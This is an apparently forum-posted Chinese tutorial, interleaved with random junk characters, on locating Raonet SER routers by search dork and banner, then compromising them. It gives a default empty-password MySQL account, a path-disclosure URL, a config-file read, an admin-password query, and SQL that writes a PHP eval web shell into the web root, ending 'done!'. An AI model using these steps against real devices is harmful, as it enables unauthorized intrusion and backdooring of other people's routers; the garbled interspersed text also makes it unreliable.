寻找存在漏洞的路由器方法:6 B, d" j# ?; w, W6 u! S9 Q
0 Q8 I# _' T! j- D5 d9 L* m1:google搜索'Raonet Subscriber Ethernet Router'
1 l4 M4 X Y1 x. p3 H
`- H1 T& K; ~- B6 B" P; E2:使用WebDAVScan扫80端口,http banner为thttpd/2.21b 23apr2001+ j. p+ t0 @* Q% o
2 f( m/ U0 @" P2 ?3:扫mysql版本号判断,SER系列路由器使用的mysql版本4.0.14,默认有一个高权限的帐户mysql,口令为空。
* Z$ U8 J. [+ j: j2 D2 D6 @8 E1 q3 ]6 D- {: U, x
//还有很多方法可以批量获取,这里不发了,请自食其力 公开了大家都玩不成......
! I- A S+ J" ~9 K, h8 H
J5 x) B" k( p" e9 J% B $ @/ K% D+ f$ L6 |! l. |
, w) j: z+ \, I, L5 u入侵步骤:
+ l2 H. H" |$ J! h9 a& o# V' F/ i5 t6 C" o% r
1.爆web路径,http://www.yu1u.org/src/jpgraph_line.php
7 u+ j/ z$ n1 P7 v4 G1 L; I# N* a- H. Y' J
2:查看数据库配置文件,http://www.yu1u.org/inc/conn_db.inc
$ B3 @) g/ i# g3 U- G3:得到密码后连接,查看GUI管理密码:5 }7 ^& j/ N# E9 @: C0 c. T
use ser_5000 w" T8 A) f) s* D
select id,passwd from user;
: A$ {) v! h0 g4:通过数据库写入webshell,执行命令:
, l( n x) R8 X" kuse mysql;
/ L" Y) t! J! k2 fcreate table ok(cmd TEXT);
: L1 J/ T Q7 A+ ^* Ainsert into ok values("<?php @eval($_POST[cmd])?>");& z8 M2 G; X* I! c! a
select * from ok into outfile "\/usr\/local\/www\/data\/src\/shell.php";1 G @) K2 t& |9 `
drop table ok;
/ h1 X& f: E( ?" ]- W( H3 T6 L
! J) d# F* T, ~) u- s9 {- u5:连接后门shell.php
7 r) O1 k' z8 Q
. y+ f. N/ ?! G1 d2 b6. 搞定!
8 S4 s4 {) m6 Z! ~, C6 i
. Y6 G" m6 \$ k$ p, ^ |